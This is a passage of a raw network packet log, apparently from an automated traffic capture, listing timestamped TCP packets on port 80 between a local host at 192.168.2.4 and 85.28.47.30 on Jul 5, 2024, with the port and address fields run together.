                                                                Jul 5, 2024 04:36:04.828480005 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.828602076 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.828613997 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.828628063 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.828651905 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.828677893 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.828679085 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.828692913 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.828722954 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.828737020 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.828761101 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.828773975 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.828783989 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.828797102 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.828808069 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.828813076 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.828833103 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.828839064 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.828865051 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.828886986 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.829051971 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.829063892 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.829073906 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.829102039 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.829117060 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.829134941 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.829147100 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.829158068 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.829178095 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.829184055 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.829209089 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.829222918 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.829318047 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.829328060 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.829338074 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.829363108 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.829381943 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.829416037 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.829427004 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.829437971 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.829448938 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.829463005 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.829484940 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.829513073 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.836673975 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.836684942 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.836697102 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.836738110 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.836746931 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.836750031 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.836762905 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.836780071 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.836788893 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.836790085 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.836806059 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.836833954 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.836838007 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.836848974 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.836858034 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.836883068 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.836885929 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.836896896 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.836905956 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.836906910 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.836934090 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.836956978 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.836992979 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.837004900 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.837018013 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.837042093 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.837052107 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.837060928 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.837066889 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.837071896 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.837084055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.837104082 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.837121010 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.837198019 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.837245941 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.837253094 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.837265015 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.837301016 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.837322950 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.837332964 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.837343931 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.837357044 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.837368011 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.837385893 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.837405920 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.837412119 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.837421894 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.837433100 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.837445974 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.837460041 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.837486029 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.837606907 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.837619066 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.837630033 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.837639093 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.837667942 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.837682009 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.910114050 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.910125971 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.910161018 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.910172939 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.910171986 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.910192966 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.910202980 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.910202980 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.910213947 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.910231113 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.910255909 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.919151068 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919208050 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919208050 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.919218063 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919233084 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919248104 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.919251919 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919265032 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.919265032 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919279099 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919280052 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.919296026 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.919306040 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.919329882 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.919441938 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919454098 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919465065 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919476032 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919487000 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919490099 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.919497013 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919507980 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919514894 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.919518948 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919523001 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.919532061 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919564009 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.919584036 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.919706106 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919715881 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919724941 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919745922 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919753075 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.919758081 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919761896 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.919768095 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919780970 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919791937 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.919797897 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919807911 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919816971 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.919816971 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919828892 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919842005 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919842958 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.919850111 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.919853926 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919863939 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919876099 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919878960 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.919888020 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919907093 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.919917107 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.919925928 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919936895 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.919967890 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.920079947 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920089960 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920103073 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920114040 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920124054 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920130014 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.920134068 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920140982 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.920145988 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920165062 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920169115 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.920176983 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920186996 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920192003 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.920197964 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920208931 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920212030 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.920222998 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920232058 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920238972 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.920263052 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.920387983 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920409918 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920422077 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920434952 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.920453072 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.920479059 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920495033 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920505047 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920531034 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.920535088 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920546055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920566082 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.920581102 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.920605898 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920615911 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920625925 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920644999 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920655012 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920676947 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.920686960 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.920715094 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920725107 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920736074 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920766115 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.920780897 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.920804977 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920815945 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920825958 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920836926 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920849085 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920855045 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.920859098 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.920877934 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.920887947 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.920912027 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.929348946 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.929362059 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.929372072 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.929413080 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.929415941 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.929428101 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.929435015 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.929439068 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.929457903 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.929466009 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.929487944 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.929497957 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.929508924 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.929511070 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.929519892 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.929539919 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.929568052 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.929626942 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.929639101 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.929649115 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.929658890 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.929671049 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.929680109 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.929682970 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.929696083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.929703951 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.929708004 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.929711103 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.929740906 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.929759026 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.929776907 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.929788113 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.929800987 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.929824114 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.929841995 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.929861069 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.929872036 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.929881096 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.929892063 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.929903984 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.929912090 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.929915905 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.929934025 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.929934978 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.929956913 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.929976940 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.930083990 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.930094957 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.930105925 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.930118084 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.930128098 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.930134058 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.930138111 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:04.930144072 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.930164099 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:04.930186033 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.002448082 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.002464056 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.002474070 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.002485991 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.002500057 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.002511978 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.002521038 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.002527952 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.002533913 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.002592087 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.002629042 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.010659933 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.010682106 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.010690928 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.010700941 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.010711908 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.010720015 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.010732889 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.010745049 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.010756969 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.010763884 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.010771990 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.010787964 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.010812044 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.010835886 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.010850906 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.010860920 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.010876894 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.010886908 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.010911942 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.010930061 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.010941982 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.010977983 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.010979891 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.010992050 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.011003971 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.011029005 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.011039972 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.011111975 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.011121988 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.011132956 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.011167049 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.011173964 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.011185884 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.011189938 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.011197090 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.011212111 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.011243105 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.011279106 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.011288881 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.011297941 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.011328936 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.011347055 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.011348009 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.011360884 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.011395931 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.011405945 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.011406898 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.011419058 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.011435986 CEST4973080192.168.2.485.28.47.30
